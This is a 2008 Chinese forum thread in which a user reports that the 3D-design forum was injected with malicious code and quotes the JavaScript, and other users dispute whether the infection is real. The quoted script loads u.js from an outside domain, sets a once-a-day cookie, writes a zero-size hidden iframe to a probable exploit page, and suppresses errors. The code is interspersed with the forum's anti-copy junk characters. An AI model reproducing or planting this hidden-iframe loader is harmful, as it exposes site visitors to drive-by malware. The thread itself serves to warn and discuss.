设为首页 |收藏本站 |帮助 |加入VIP |积分充值

QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

返回
发新贴
展开

通知     

查看: 2118|回复: 16
收起左侧

此网被挂马

[复制链接]
czy12
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script> / h8 ~9 O" W# U" y9 c* j( {

  2. : @' X2 x1 F0 d: Q' U0 @/ T# k
  3. document.writeln("<script>";7 u  k; v& `6 L6 p
  4. document.writeln("function oK_Begin(){";
    6 m0 t* \3 `& S! l' j. C3 N+ e3 r
  5. document.writeln("var Then = new Date() ";
    1 b  E1 c! t# F; M$ K
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
    " Q3 J! H* d  y. q6 V
  7. document.writeln("var cookieString = new String(document.cookie)";
    ) j1 k1 v. t1 V& t& v
  8. document.writeln("var cookieHeader = "Cookie1=" ";
      a/ ?* \8 g  }2 J& ?4 }
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";; Z' o: S3 a7 I+ k
  10. document.writeln("if (beginPosition != -1){ ";6 N9 q( z1 T) N% X- L
  11. document.writeln("} else ";% Z# e; \& U. R( B0 j+ g6 s: x. D
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";* T' O4 n% v7 M6 J
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    . X1 C+ `4 E7 u4 W( R9 I
  14. document.writeln("}";) E9 Z9 ^% N" v
  15. document.writeln("}";1 _0 x- R- H+ ?8 v/ Z
  16. document.writeln("oK_Begin();";9 X/ l' Z, \9 U
  17. document.writeln("<\/script>";
    . s6 Z3 c" V# V+ W% c- w6 n
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"6 Z) F$ C: S7 p' @! _7 w: k' D
  19. * r, J& d; ]/ y" [
  20. & Y! X* a1 }) q9 ~* @
  21. ; z3 ?3 V/ X& S3 }

  22. ( ^" k2 W# ^1 l: @) r1 j) R
  23. 0 J+ O% c: y/ D7 t: K
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
回复

举报

19720205
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
回复 支持 反对

举报

cayuer
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
回复 支持 反对

举报

czy12
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.$ ~) g3 f/ M$ H+ B
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.3 _" F; `9 I; a( t6 Z3 D# D
不过,已经被清理了.2 z  i7 Q* ]% p0 o

9 R/ B* i! @( v% zHEHE) G5 W* [% u: j5 l( ~8 r0 B$ I
6 ^; {0 ?% |( }) v. V
[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
回复 支持 反对

举报

江南有雪
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?& p$ `  @: r# `  G. P) E
3 t$ O. C4 R+ k
ht tp://u.cruze3.cn/u.js
回复 支持 反对

举报

czy12
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js
/ G, v- ^4 `1 }) _5 A此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
9 ?; `. y5 B9 [9 z1 ~- H5 S这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
- C8 `" \1 @5 {+ A* W( rHEHE
回复 支持 反对

举报

wwqq
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
回复 支持 反对

举报

czy12
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.
, f: I+ S5 H+ V1 E  ]9 m4 ^红线所指
moma.jpg
回复 支持 反对

举报

huang_baker
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
回复 支持 反对

举报

小雪
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
回复 支持 反对

举报

czy12
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.
. i$ T( E: P1 @% b' j; PHEHE
mlm.jpg
回复 支持 反对

举报

yyywwwhk
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:
) p, q! ]% J. k, a: Yhttp://www.3dportal.cn/discuz/ 之原$ Z5 I7 L5 d. O! e
似乎看不见楼主所说的 http://u.cruze3.cn/u.js( @! M. k* A7 p5 B) W
9 q$ E" f8 T! `8 B. l' K9 \! Z7 k: l, {
[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
回复 支持 反对

举报

新洁电子
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!9 d( D  J3 B7 Q; _7 @4 p

, W. g7 a- U1 {7 ]请清理自己计算机的缓冲区!
1.JPG
回复 支持 反对

举报

hebei
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

举报

college
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
回复 支持 反对

举报

czy12
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。! c8 q  R/ r/ e+ U
我也说了:已修复。3 ?2 \8 X( {( J

, h: S, [, @% J6 u0 m: d' sps:这与缓存毫无关系。虽然缓存中有U.JS.: J' T1 n% A2 S+ Y2 @
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?( ?7 Y% t5 O! v; r; |
8 n0 Z5 M4 L% p2 S! [  b
script是个JAVA代码,与U盘何关?
* @9 B. X6 s6 q$ e; d% @6 l4 @) r  a9 C: D* P/ ?* q
HEHE7 }  r. z6 U1 M4 S& x" ]: N
. Y" F. F: X# i: H9 [
[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
回复 支持 反对

举报

新洁电子
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!( M$ K/ H! d) {8 _
4 r4 ]' V% `5 A% s' I
如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。) F0 }5 T7 C  ^' z  C2 z3 a
6 i4 n# m) ?4 z+ E
相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
回复 支持 反对

举报

发表回复
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表